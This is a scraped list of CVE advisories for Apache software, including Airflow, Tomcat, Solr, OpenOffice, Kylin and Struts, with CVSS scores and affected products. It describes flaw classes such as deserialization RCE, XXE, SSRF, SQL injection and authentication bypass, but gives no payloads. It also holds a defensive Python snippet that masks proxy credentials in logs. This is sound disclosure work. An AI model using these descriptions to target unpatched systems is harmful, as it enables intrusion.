** UNSUPPORTED WHEN ASSIGNED ** Inefficient Regular Expression Complexity vulnerability in Apache Traffic Control. This issue affects Apache Traffic Control: all versions. People with access to the management interface of the Traffic Router component could specify malicious patterns and cause unavailability. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2025-61622

Deserialization of untrusted data in Python in pyfory versions 0.12.0 through 0.12.2, or the legacy pyfury versions from 0.1.0 through 0.10.3, allows arbitrary code execution. An application is vulnerable if it reads pyfory serialized data from untrusted sources. An attacker can craft a data stream that selects the pickle-fallback serializer during deserialization, leading to the execution of `pickle.loads`, which is vulnerable to remote code execution. Users are recommended to upgrade to pyfory version 0.12.3 or later, which has removed the pickle fallback serializer and thus fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache fory *
CVE-2025-61623

Reflected cross-site scripting vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.03. Users are recommended to upgrade to version 24.09.03, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2025-61733

Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Kylin. This issue affects Apache Kylin: from 4.0.0 through 5.0.2. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache kylin *
CVE-2025-61734

Files or Directories Accessible to External Parties vulnerability in Apache Kylin. You are fine as long as Kylin's system and project admin access is well protected. This issue affects Apache Kylin: from 4.0.0 through 5.0.2. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache kylin *
CVE-2025-61735

Server-Side Request Forgery (SSRF) vulnerability in Apache Kylin. This issue affects Apache Kylin: from 4.0.0 through 5.0.2. You are fine as long as Kylin's system and project admin access is well protected. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache kylin *
CVE-2025-61795

Improper Resource Shutdown or Release vulnerability in Apache Tomcat. If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to disc were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.11, from 10.1.0-M1 through 10.1.46, from 9.0.0.M1 through 9.0.109. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.12 or later, 10.1.47 or later or 9.0.110 or later, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H 1.6 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-62228

Apache Flink CDC version 3.4.0 was vulnerable to a SQL injection via maliciously crafted identifiers, e.g. a crafted database name or crafted table name. Even though only the logged-in database user can trigger the attack, we recommend users update Flink CDC to version 3.5.0, which addresses this issue.

Products Affected

Vendor Product Version
apache flink_cdc 3.4.0
CVE-2025-62232

Sensitive data exposure via logging in basic-auth leads to plaintext usernames and passwords being written to error logs and forwarded to log sinks when the log level is INFO/DEBUG. This creates a high risk of credential compromise through log access. It has been fixed in the following commit: https://github.com/apache/apisix/pull/12629 Users are recommended to upgrade to version 3.14, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apisix *
CVE-2025-62233

Deserialization of Untrusted Data vulnerability in Apache DolphinScheduler RPC module. This issue affects Apache DolphinScheduler: Version >= 3.2.0 and < 3.3.1. Attackers who can access the Master or Worker nodes can compromise the system by creating a StandardRpcRequest, injecting a malicious class type into it, and sending RPC requests to the DolphinScheduler Master/Worker nodes. Users are recommended to upgrade to version 3.3.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2025-62235

Authentication Bypass by Spoofing vulnerability in Apache NimBLE. Receiving a specially crafted Security Request could lead to removal of the original bond and re-bonding with an impostor. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache nimble *
CVE-2025-62402

API users via `/api/v2/dagReports` could perform Dag code execution in the context of the api-server if the api-server was deployed in the environment where Dag files were available.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-62503

A user with CREATE but no UPDATE privilege for Pools, Connections, or Variables could update existing records via the bulk create API with the overwrite action.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.6 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 2.1 2.5

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-62728

SQL injection vulnerability in Hive Metastore Server (HMS) when processing delete column statistics requests via the Thrift APIs. The vulnerability is only exploitable by trusted/authorized users/applications that are allowed to call the Thrift APIs directly. In most real-world deployments, HMS is accessible to only a handful of applications (e.g., Hiveserver2), thus the vulnerability is not exploitable. Moreover, the vulnerable code cannot be reached when the metastore.try.direct.sql property is set to false. This issue affects Apache Hive: from 4.1.0 before 4.2.0. Users are recommended to upgrade to version 4.2.0, which fixes the issue. Users who cannot upgrade directly are encouraged to set the metastore.try.direct.sql property to false if the HMS Thrift APIs are exposed to the general public.

Products Affected

Vendor Product Version
apache hive 4.1.0
CVE-2025-64401

Apache OpenOffice documents can contain links. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of Apache OpenOffice, documents that used "floating frames" linked to external files would load the contents of those frames without prompting the user for permission to do so. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue. The LibreOffice suite reported this issue as CVE-2023-2255.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64402

Apache OpenOffice documents can contain links. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of Apache OpenOffice, documents that used "OLE objects" linked to external files would load the contents of those files without prompting the user for permission to do so. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64403

Apache OpenOffice Calc spreadsheets can contain links to other files, in the form of "external data sources". A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause such links to be loaded without prompt. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64404

Apache OpenOffice documents can contain links to other files. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of Apache OpenOffice, documents that used background fill images, or bullet images, linked to external files would load the contents of those files without prompting the user for permission to do so. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64405

Apache OpenOffice documents can contain links. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of Apache OpenOffice, Calc spreadsheets containing DDE links to external files would load the contents of those files without prompting the user for permission to do so. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64406

An out-of-bounds Write vulnerability in Apache OpenOffice could allow an attacker to craft a document that would crash the program, or otherwise corrupt other memory areas. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L 2.8 1.4

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64407

Apache OpenOffice documents can contain links. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. Such links could also be used to transmit system information, such as environment variables or configuration settings. In the affected versions of Apache OpenOffice, documents that used a certain URI scheme linking to external files would load the contents of such files without prompting the user for permission to do so. That URI scheme allows system configuration data to be included that is not supposed to be transmitted externally. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue. The LibreOffice suite reported this issue as CVE-2024-12426.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64408

Apache Causeway faces Java deserialization vulnerabilities that allow remote code execution (RCE) through user-controllable URL parameters. These vulnerabilities affect all applications using Causeway's ViewModel functionality and can be exploited by authenticated attackers to execute arbitrary code with application privileges. This issue affects all current versions. Users are recommended to upgrade to version 3.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache causeway *
apache causeway 4.0.0
CVE-2025-64775

Denial of Service vulnerability in Apache Struts: a file leak in multipart request processing causes disk exhaustion. This issue affects Apache Struts: from 2.0.0 through 6.7.0, from 7.0.0 through 7.0.3. Users are recommended to upgrade to version 6.8.0 or 7.1.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache struts *
CVE-2025-65082

Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache HTTP Server through environment variables set via the Apache configuration unexpectedly superseding variables calculated by the server for CGI programs. This issue affects Apache HTTP Server from 2.4.0 through 2.4.65. Users are recommended to upgrade to version 2.4.66 which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-65998

Apache Syncope can be configured to store the user password values in the internal database with AES encryption, though this is not the default option. When AES is configured, the default key value, hard-coded in the source code, is always used. This allows a malicious attacker who has obtained access to the internal database content to reconstruct the original cleartext password values. This does not affect encrypted plain attributes, whose values are also stored using AES encryption. Users are recommended to upgrade to version 3.0.15 / 4.0.3, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache syncope *
CVE-2025-66168

WARNING: Users of 6.x should upgrade to 6.2.4 or later as the fix was missed in previous 6.x releases. See the following for more details: https://activemq.apache.org/security-advisories.data/CVE-2026-40046-announcement.txt https://www.cve.org/CVERecord?id=CVE-2026-40046
Original Report: Apache ActiveMQ does not properly validate the remaining length field, which may lead to an overflow during the decoding of malformed packets. When this integer overflow occurs, ActiveMQ may incorrectly compute the total Remaining Length and subsequently misinterpret the payload as multiple MQTT control packets, which makes the broker susceptible to unexpected behavior when interacting with non-compliant clients. This behavior violates the MQTT v3.1.1 specification, which restricts Remaining Length to a maximum of 4 bytes. The scenario occurs on established connections after the authentication process. Brokers that do not enable mqtt transport connectors are not impacted. This issue affects Apache ActiveMQ: before 5.19.2, 6.0.0 to 6.1.8, and 6.2.0. Users are recommended to upgrade to version 5.19.2, 6.1.9, or 6.2.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache activemq *
apache activemq 6.2.0
CVE-2025-66169

Cypher Injection vulnerability in Apache Camel camel-neo4j component. This issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.3, from 4.15.0 before 4.17.0. Users are recommended to upgrade to version 4.10.8 for 4.10.x LTS, 4.14.3 for 4.14.x LTS, or 4.17.0.

Products Affected

Vendor Product Version
apache camel *
CVE-2025-66200

mod_userdir+suexec bypass via AllowOverride FileInfo vulnerability in Apache HTTP Server. Users with access to use the RequestHeader directive in htaccess can cause some CGI scripts to run under an unexpected userid. This issue affects Apache HTTP Server: from 2.4.7 through 2.4.65. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L 2.8 2.5

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-66388

A vulnerability in Apache Airflow allowed authenticated UI users to view secret values in rendered templates due to secrets not being properly redacted, potentially exposing secrets to users without the appropriate authorization. Users are recommended to upgrade to version 3.1.4, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-66516

Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. This CVE covers the same vulnerability as in CVE-2025-54988. However, this CVE expands the scope of affected packages in two ways. First, while the entrypoint for the vulnerability was the tika-parser-pdf-module as reported in CVE-2025-54988, the vulnerability and its fix were in tika-core. Users who upgraded the tika-parser-pdf-module but did not upgrade tika-core to >= 3.2.2 would still be vulnerable. Second, the original report failed to mention that in the 1.x Tika releases, the PDFParser was in the "org.apache.tika:tika-parsers" module.

Products Affected

Vendor Product Version
apache tika *
CVE-2025-66518

Any client who can access Apache Kyuubi Server via Kyuubi frontend protocols can bypass the server-side config kyuubi.session.local.dir.allow.list and use local files which are not listed in the config. This issue affects Apache Kyuubi: from 1.6.0 through 1.10.2. Users are recommended to upgrade to version 1.10.3 or later, which fixes the issue.

Products Affected

Vendor Product Version
apache kyuubi *
CVE-2025-66524

Apache NiFi 1.20.0 through 2.6.0 include the GetAsanaObject Processor, which requires integration with a configurable Distribute Map Cache Client Service for storing and retrieving state information. The GetAsanaObject Processor used generic Java Object serialization and deserialization without filtering. Unfiltered Java object deserialization does not provide protection against crafted state information stored in the cache server configured for GetAsanaObject. Exploitation requires an Apache NiFi system running with the GetAsanaObject Processor, and direct access to the configured cache server. Upgrading to Apache NiFi 2.7.0 is the recommended mitigation, which replaces Java Object serialization with JSON serialization. Removing the GetAsanaObject Processor located in the nifi-asana-processors-nar bundle also prevents exploitation.

Products Affected

Vendor Product Version
apache nifi 2.7.0
apache nifi *
CVE-2025-66614

Improper Input Validation vulnerability. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0-M1 through 9.0.112. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Older EOL versions are not affected. Tomcat did not validate that the host name provided via the SNI extension was the same as the host name provided in the HTTP host header field. If Tomcat was configured with more than one virtual host and the TLS configuration for one of those hosts did not require client certificate authentication but another one did, it was possible for a client to bypass the client certificate authentication by sending different host names in the SNI extension and the HTTP host header field. The vulnerability only applies if client certificate authentication is only enforced at the Connector. It does not apply if client certificate authentication is enforced at the web application. Users are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat 9.0.0
CVE-2025-66675

Denial of Service vulnerability in Apache Struts: a file leak in multipart request processing causes disk exhaustion. This issue affects Apache Struts: from 2.0.0 through 6.7.4, from 7.0.0 through 7.0.3. Users are recommended to upgrade to version 6.8.0 or 7.1.1, which fixes the issue. It is related to https://cve.org/CVERecord?id=CVE-2025-64775; this CVE addresses the missing affected version 6.7.4.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H 3.9 4.2

Products Affected

Vendor Product Version
apache struts *
CVE-2025-67895

Edge3 Worker RPC RCE on Airflow 2. This issue affects Apache Airflow Providers Edge3: before 2.0.0, and only if you installed and configured it on Airflow 2. Edge3 provider support in Airflow 2 has always been development-only and was never officially released; however, if you installed and configured the Edge3 provider on Airflow 2, it implicitly enabled a normally non-public API that was used to test the Edge provider on Airflow 2 during development. This API allowed a Dag author to perform Remote Code Execution in the webserver context, which a Dag author is not supposed to be able to do. If you installed and configured the Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider versions (>=2.0.0) set the minimum Airflow version to 3 and remove the RCE-prone Airflow 2 code, so it should no longer be possible to use Edge3 provider 2.0.0+ on Airflow 2. If you used the Edge provider on Airflow 3, you are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache apache-airflow-providers-edge3 *
CVE-2025-68161

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName configuration attribute or the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName system property is set to true. This issue may allow a man-in-the-middle attacker to intercept or redirect log traffic under the following conditions: * The attacker is able to intercept or redirect network traffic between the client and the log receiver. * The attacker can present a server certificate issued by a certification authority trusted by the Socket Appender’s configured trust store (or by the default Java trust store if no custom trust store is configured). Users are advised to upgrade to Apache Log4j Core version 2.25.3, which addresses this issue. As an alternative mitigation, the Socket Appender may be configured to use a private or restricted trust root to limit the set of trusted certificates.

Products Affected

Vendor Product Version
apache log4j 2.0
apache log4j *
CVE-2025-68280

Improper Restriction of XML External Entity Reference vulnerability in Apache SIS. It is possible to write XML files in such a way that, when parsed by Apache SIS, the XML file reveals to the attacker the content of a local file on the server running Apache SIS. This vulnerability impacts the following SIS services: * Reading of GeoTIFF files having the GEO_METADATA tag defined by the Defense Geospatial Information Working Group (DGIWG). * Parsing of ISO 19115 metadata in XML format. * Parsing of Coordinate Reference Systems defined in the GML format. * Parsing of files in GPS Exchange Format (GPX). This issue affects Apache SIS from versions 0.4 through 1.5 inclusive. Users are recommended to upgrade to version 1.6, which fixes the issue. In the meantime, the vulnerability can be avoided by launching Java with the javax.xml.accessExternalDTD system property set to a comma-separated list of authorized protocols (an empty list denies all external DTD access). For example: java -Djavax.xml.accessExternalDTD="" ...

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache spatial_information_system *
CVE-2025-68493

Missing XML Validation vulnerability in Apache Struts. This issue affects Apache Struts: from 2.0.0 before 2.2.1, and from 2.2.1 through 6.1.0. Users are recommended to upgrade to version 6.1.1, which fixes the issue.

Products Affected

Vendor Product Version
apache struts *
CVE-2025-68637

The Uniffle HTTP client is configured to trust all SSL certificates and disables hostname verification by default. This insecure configuration exposes all REST API communication between the Uniffle CLI/client and the Uniffle Coordinator service to potential Man-in-the-Middle (MITM) attacks. This issue affects all versions before 0.10.0. Users are recommended to upgrade to version 0.10.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache uniffle *
CVE-2025-68675

In Apache Airflow versions before 3.1.6 (Airflow 3) and before 2.11.1 (Airflow 2), the proxies and proxy fields within a Connection may include proxy URLs containing embedded authentication information. These fields were not treated as sensitive by default and therefore were not automatically masked in log output. As a result, when such connections are rendered or printed to logs, proxy credentials embedded in these fields could be exposed. Users are recommended to upgrade to 3.1.6 or later for Airflow 3, and 2.11.1 or later for Airflow 2, which fixes this issue.
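
The fix is to treat a URL-shaped field as a credential carrier and mask its userinfo before anything is rendered. The Python below is an added illustration, not Airflow's own masking code; the set of field names it treats as sensitive and the sample connection extra are constructed for the example.

```python
import json
from urllib.parse import urlsplit, urlunsplit

MASK = "***"

# Assumed field names under which a proxy URL may be stored in a Connection.
SENSITIVE_KEYS = {"proxies", "proxy", "http_proxy", "https_proxy"}


def mask_url_credentials(url: str) -> str:
    """Replace the user:password part of a URL's authority with a fixed mask,
    keeping scheme, host, port, path and query intact."""
    parts = urlsplit(url)
    if parts.username is None and parts.password is None:
        return url
    host = parts.hostname or ""
    if ":" in host:                      # IPv6 literal: put the brackets back
        host = f"[{host}]"
    userinfo = MASK if parts.password is None else f"{MASK}:{MASK}"
    netloc = f"{userinfo}@{host}"
    if parts.port is not None:
        netloc += f":{parts.port}"
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))


def _mask_value(value):
    """Recurse into strings, dicts and lists so a scheme->URL map is covered."""
    if isinstance(value, str):
        return mask_url_credentials(value)
    if isinstance(value, dict):
        return {k: _mask_value(v) for k, v in value.items()}
    if isinstance(value, list):
        return [_mask_value(v) for v in value]
    return value


def mask_connection_extra(extra: dict) -> dict:
    """Return a copy of a Connection's extra dict with proxy credentials masked."""
    return {
        key: (_mask_value(val) if key.lower() in SENSITIVE_KEYS else val)
        for key, val in extra.items()
    }


def render_for_log(extra: dict) -> str:
    """The string a log line should carry: masked first, serialised second."""
    return json.dumps(mask_connection_extra(extra), sort_keys=True)


# Constructed sample: the shape that leaked before the fix.
SAMPLE_EXTRA = {
    "proxies": {"http": "http://alice:s3cret@proxy.corp.example:3128",
                "https": "https://proxy.corp.example:3128"},
    "timeout": 30,
}
```

The masking is deliberately done on the parsed URL rather than with a regular expression, so an `@` inside a path or query cannot trick it, and the host/port survive for debugging.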

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-69219

A user with access to the database could craft a database entry that results in code execution on the Triggerer, which gives anyone who has access to the database the same permissions as a Dag author. Since direct database access is neither usual nor recommended for Airflow, the likelihood of this causing any damage is low. You should upgrade to version 6.0.0 of the provider to avoid even that risk.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache airflow_providers_http *
CVE-2026-22022

Deployments of Apache Solr 5.3.0 through 9.10.0 that rely on Solr's "Rule Based Authorization Plugin" are vulnerable to allowing unauthorized access to certain Solr APIs, due to insufficiently strict input validation in those components.  Only deployments that meet all of the following criteria are impacted by this vulnerability: * Use of Solr's "RuleBasedAuthorizationPlugin" * A RuleBasedAuthorizationPlugin config (see security.json) that specifies multiple "roles" * A RuleBasedAuthorizationPlugin permission list (see security.json) that uses one or more of the following pre-defined permission rules: "config-read", "config-edit", "schema-read", "metrics-read", or "security-read". * A RuleBasedAuthorizationPlugin permission list that doesn't define the "all" pre-defined permission * A networking setup that allows clients to make unfiltered network requests to Solr. (i.e. user-submitted HTTP/HTTPS requests reach Solr as-is, unmodified or restricted by any intervening proxy or gateway) Users can mitigate this vulnerability by ensuring that their RuleBasedAuthorizationPlugin configuration specifies the "all" pre-defined permission and associates the permission with an "admin" or other privileged role.  Users can also upgrade to a Solr version outside of the impacted range, such as the recently released Solr 9.10.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 3.9 4.2

Products Affected

Vendor Product Version
apache solr *
CVE-2026-22444

The "create core" API of Apache Solr 8.6 through 9.10.0 lacks sufficient input validation on some API parameters, which can cause Solr to check the existence of and attempt to read file-system paths that should be disallowed by Solr's "allowPaths" security setting ( https://solr.apache.org/guide/solr/latest/configuration-guide/configuring-solr-xml.html#the-solr-element ). These read-only accesses can allow users to create cores using unexpected configsets if any are accessible via the filesystem. On Windows systems configured to allow UNC paths this can additionally cause disclosure of NTLM "user" hashes. Solr deployments are subject to this vulnerability if they meet the following criteria: * Solr is running in its "standalone" mode. * Solr's "allowPaths" setting is being used to restrict file access to certain directories. * Solr's "create core" API is exposed and accessible to untrusted users. This can happen if Solr's RuleBasedAuthorizationPlugin ( https://solr.apache.org/guide/solr/latest/deployment-guide/rule-based-authorization-plugin.html ) is disabled, or if it is enabled but the "core-admin-edit" predefined permission (or an equivalent custom permission) is given to low-trust (i.e. non-admin) user roles. Users can mitigate this by enabling Solr's RuleBasedAuthorizationPlugin (if disabled) and configuring a permission list that prevents untrusted users from creating new Solr cores. Users should also upgrade to Apache Solr 9.10.1 or greater, which contains fixes for this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N 2.8 4.2

Products Affected

Vendor Product Version
apache solr *
CVE-2026-22922

Apache Airflow versions 3.1.0 through 3.1.6 contain an authorization flaw that can allow an authenticated user with custom permissions limited to task access to view task logs without having task log access. Users are recommended to upgrade to Apache Airflow 3.1.7 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
